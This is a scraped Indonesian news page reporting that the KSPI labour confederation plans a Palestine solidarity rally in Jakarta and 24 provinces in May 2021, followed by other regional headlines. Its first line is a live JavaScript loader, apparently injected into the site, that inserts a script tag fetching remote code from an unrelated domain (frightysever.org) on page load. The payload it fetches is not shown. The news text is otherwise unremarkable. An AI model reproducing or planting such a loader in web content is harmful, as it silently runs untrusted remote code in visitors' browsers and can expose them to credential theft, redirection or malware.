(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
KANALKALIMANTAN.COM – Konfederasi Serikat Pekerja Indonesia (KSPI) akan menggelar aksi unjuk rasa solidaritas buruh untuk Palestina, Selasa (18/5/2021) hari ini. Rencanya, KSPI akan berkumpul di kawasan Patung Kuda yang terletak tak jauh dari Jalan Medan Merdeka Barat, Jakarta Pusat.
Dari titik kumpul, mereka akan bergerak ke Kantor PBB yang berlokasi di Jalan M.H Thamrin, Jakarta Pusat. Diperkirakan, 200 massa dari KSPI akan turun ke jalan.
Baca juga: Usia 41 Tahun Perpusnas RI, Ini Harapan Kadispersip Kalsel
“Di Jakarta kemungkinan 200an massa,” kata Ketua Departemen Media dan Komunikasi KSPI, Kahar S. Cahyono dalam pesan singkat.
Kahar melanjutkan, aksi solidaritas tidak hanya digelar di Ibu Kota. Aksi serupa juga akan digelar di sejumlah daerah dan jika digabungkan, jumlah peserta aksi bisa mencapai ribuan.
Baca Juga:
37 Knalpot Blong Diamankan, Kasat Lantas Polres Batola: Siap Dijadikan Monumen
“Tapi kalau digabung dengan aksi di daerah-daerah lain bisa mencapai ribuan,” sambungnya.
Dalam keterangan tertulisnya, Presiden KSPI Said Iqbal mengatakan, aksi solidaritas ini serentak digelar di 24 provinsi. Aksi unjuk rasa dilakukan sebagai bentuk solidaritas dan dukungan dari buruh Indonesia terhadap rakyat Palestina.
“Aksi ini merupakan bagian dari aksi serentak nasional yang diselenggarakan KSPI di 24 provinsi sebagai bentuk solidaritas dan dukungan dari buruh Indonesia terhadap rakyat Palestina,” beber Said. (suara.com)
KANALKALIMANTAN.COM, MARTAPURA - Genangan air di sejumlah kecamatan di Kabupaten Banjar masih belum menunjukkan penurunan… Read More
KANALKALIMANTAN.COM, BANJARBARU - Aktivitas seismik di daratan Kalimantan kembali terjadi melalui rangkaian gempa tektonik dangkal… Read More
KANALKALIMANTAN.COM, PARINGIN - Jembatan penghubung antara Desa Langkap dan Desa Raranum, Kecamatan Tebing Tinggi, Kabupaten… Read More
KANALKALIMANTAN.COM, PARINGIN – Pascabanjir bandang di Kabupaten Balangan memasuki hari keempat. Data terbaru menunjukkan jumlah… Read More
Pemerintah Provinsi Kalimantan Barat secara resmi telah menetapkan besaran Upah Minimum Provinsi (UMP) dan Upah… Read More
Pemerintah Pusat telah merilis formula perhitungan UMP 2026 sejak 18 Desember 2025. Adapun tenggat waktu… Read More
This website uses cookies.